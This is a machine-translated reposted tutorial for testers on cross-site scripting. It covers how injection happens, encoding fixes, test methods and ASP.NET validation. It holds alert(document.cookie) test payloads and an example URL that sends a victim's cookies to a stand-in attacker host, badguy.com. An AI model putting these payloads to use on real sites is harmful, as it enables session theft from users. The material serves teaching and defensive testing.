XSS for web security testing

This article transferred from: http://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.html

The XSS full name (cross site Scripting) multi-site Scripting attack is the most common vulnerability in Web applications.  An attacker embeds a client script (such as JavaScript) in a Web page, and when the user browses to the page, the script executes on the user's browser to achieve the attacker's purpose. For example, get the user's cookie, navigate to a malicious website, carry a Trojan horse, etc.

As testers, you need to understand the principles of XSS, attack scenarios, and how to fix them. Can effectively prevent the occurrence of XSS.

Read directory How XSS is occurring HTML Encode XSS attack scenario XSS vulnerability fix how to test XSS vulnerability HTML Encode and URL Encode differences in the browser of the XSS filter ASP. NET XSS security mechanism How does XSS happen?

If there is a textbox below

<input type= "text" name= "Address1" value= "Value1from" >

Value1from is the input from the user, if the user is not the input value1from, but instead enters "/><script>alert (document.cookie) </script><!- Then it will become

<input type= "text" name= "Address1" value= "/><script>alert (document.cookie) </script><!-" >

Embedded JavaScript code will be executed

Or the user enters "onfocus=" alert (document.cookie), then it becomes

<input type= "text" name= "Address1" value= "onfocus=" alert (document.cookie) ">

The embedded JavaScript code will be executed when the event is triggered.

The power of the attack depends on what kind of script the user has entered

Of course, user-submitted data can also be sent to the server via QueryString (placed in a URL) and cookies. For example, the following figure

HTML Encode

The reason that XSS occurs is because the data entered by the user becomes code. So we need to do HTML encode processing of the data entered by the user. Encode special characters such as "bracket", "single quote", "quotation mark".

A ready-made approach has been provided in C #, as long as you call Httputility.htmlencode ("string <scritp>"). (Need to reference system.web assembly)

Fiddler also provides a handy tool to click on the "Textwizard" button on the toolbar

XSS Attack Scenario

1. The dom-based XSS vulnerability attack process is as follows

Tom found a page in victim.com with an XSS vulnerability,

Example: Http://victim.com/search.asp?term=apple

The code for the Search.asp page in the server is probably the following

 
Tom first set up a website http://badguy.com to receive "steal" information.
Then Tom constructs a malicious URL (below), sent to Monica in some way (mail, QQ)

Http://victim.com/search.asp?term=<script>window.open ("http://badguy.com?cookie=" +document.cookie) </ Script>
 
Monica clicked on this URL, the malicious JavaScript code embedded in the URL will be executed in Monica's browser. Then Monica cookies on the victim.com website will be sent to the Badguy website. So the information Monica in Victim.com was stolen by Tom.


2. Stored xss (stored XSS Vulnerability), a vulnerability that is widely applied and potentially impacting the security of a large Web server, an attacker uploads an attack script to a Web server so that all users accessing the page are exposed to the possibility of information disclosure. The attack process is as follows

Alex found out there was an XSS vulnerability on site A that allowed the attack code to be saved in the database.

Alex has published an article that embeds malicious JavaScript code in the article.

When other people like Monica visit this article, the malicious JavaScript code embedded in the article will be executed in Monica's browser, and the session cookie or other information will be stolen by Alex.


The dom-based XSS vulnerability threatens the individual user, and the object that the stored XSS vulnerability threatens is a large number of users.

XSS bug Fix

Principle: Do not trust the data entered by the customer
Note: The attack code does not necessarily mark important cookies as HTTP only in <script></script>, so that the Document.cookie statement in JavaScript cannot get a cookie. Only allow users to enter the data we expect. For example: In a TextBox of age, only users are allowed to enter numbers. and the characters outside the numbers are filtered out. HTML Encode processing of data filters or removes special HTML tags, such as: <script>, <iframe>, &lt; for <, &gt; For &quot, the label for the filter JavaScript event. such as "onclick=", "onfocus" and so on. How to test XSS vulnerabilities

Method One: Look at the code, look for the key variables, the client transmits the data to the Web server generally in three ways Querystring, form forms, and cookies. For example, in an ASP program, the client's variables are obtained through the request object

<%
Strusercode =  request.querystring ("code");
struser =  Request.Form ("USER");
Strid =    request.cookies ("ID");
%>
 
If the variable is not htmlencode processed, then there is an XSS vulnerability in this variable


Method Two: Prepare the test script,

"/><script>alert (document.cookie) </script><!--
<script>alert (document.cookie) </ script><!--
"onclick=" alert (document.cookie)
 
In the Web page of the textbox or other places to enter data, enter these test scripts, see if you can pop up a dialog box, can pop up to indicate the existence of XSS vulnerability

See those variables in the URL to pass the value to the Web server through the URL, and return the values of these variables to our test script. and see if our script can execute.


Method Three: Automated test XSS vulnerability
Now there are a lot of XSS scanning tools. Implementing XSS Automation Testing is simple and requires only the HttpWebRequest class. Include the XSS test script. Sent to the Web server. Then look at the HttpWebResponse, whether our XSS test script has been injected in. the difference between HTML Encode and URL Encode

At first I always confuse these two things, which is actually two different things.

HTML encoding has been described earlier, about URL encoding to conform to the specifications of the URL. Because Chinese and many characters in the standard URL specification are not allowed to appear in the URL.

For example, search for "test Chinese characters" in Baidu. The URL will become
http://www.baidu.com/s?wd=%B2%E2%CA%D4%BA%BA%D7%D6&rsv_bp=0&rsv_spt=3&inputT=7477


The so-called URL code is: all non-alphanumeric characters will be replaced with a percent sign (%) followed by a two-digit hexadecimal number, the space is encoded as a plus (+)


A ready-made approach has been provided in C #, as long as you call Httputility.urlencode ("string <scritp>"). (Need to reference system.web assembly)

Fiddler also provides a handy tool to click on the "Textwizard" button on toolbar in the browser of the XSS filter

To prevent XSS, many browser vendors add security to the browser to filter for XSS. For example, Ie8,ie9,firefox, Chrome. All have security mechanisms for XSS. The browser will block XSS. For example, the following figure



If you need to do a test, it is best to use IE7. ASP. The XSS security mechanism in net

Asp. NET has a mechanism to prevent XSS, the submitted form will automatically check for XSS, when the user tries to enter the XSS code, ASP. NET throws an error as shown below


Many programmers do not have the concept of security, or even know that there is an XSS. Asp. NET at this point to do the default security. In this way, even a security-conscious programmer can write a "safer site."

If you want to disable this security feature, you can use <%@ page validaterequest= "false"%>